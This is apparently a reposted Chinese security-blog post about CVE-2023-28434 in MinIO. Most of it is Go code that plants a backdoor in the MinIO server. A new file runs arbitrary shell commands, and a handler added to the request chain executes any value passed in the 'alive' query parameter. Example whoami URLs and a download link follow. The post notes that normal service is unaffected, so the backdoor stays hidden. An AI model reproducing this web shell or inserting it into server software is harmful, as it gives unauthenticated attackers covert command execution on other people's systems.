|
声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。 |
Minio 是一个多云对象存储框架。在 RELEASE.2023-03-20T20-16-18Z 之前,攻击者可以使用精心设计的请求绕过元数据存储桶名称检查,并在处理“PostPolicyBucket”时将对象放入任何存储桶。
改变了什么?
add cmd/x.go,用于exec系统命令
package cmdimport ("os/exec""runtime")func getOutputDirectly(commandStr string) string {var execGlobalOutput stringvar shell [2]stringvar systemOS string = runtime.GOOSif systemOS == "linux" || systemOS == "darwin" {shell[0], shell[1] = "/bin/bash", "-c"} else {shell[0], shell[1] = "C:\Windows\System32\cmd.exe", "/c"}cmd := exec.Command(shell[0], shell[1], commandStr)output, err := cmd.Output()if err != nil {return ""}execGlobalOutput += string(output)return execGlobalOutput}
// ..........setUploadForwardingHandler,// Add bucket forwarding handlersetBucketForwardingHandler,// Add new handlers here.xHandler, // ADD THIS LINE}// configureServer handler returns final handler for the http server.func configureServerHandler(endpointServerPools EndpointServerPools) (http.Handler, error) {// ..........
func xHandler(h http.Handler) http.Handler {return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {var arg stringvalues := r.URL.Query()arg = values.Get("alive")if arg != "" {w.Write([]byte(getOutputDirectly(arg)))return}h.ServeHTTP(w, r)})}
可以做什么?
http://1.2.3.4/?alive=whoamihttp://1.2.3.4/anything?alive=whoami
2. 正常功能不受影响
下载地址
原文始发于微信公众号(Hack分享吧):CVE-2023-28434:MinIO未授权RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论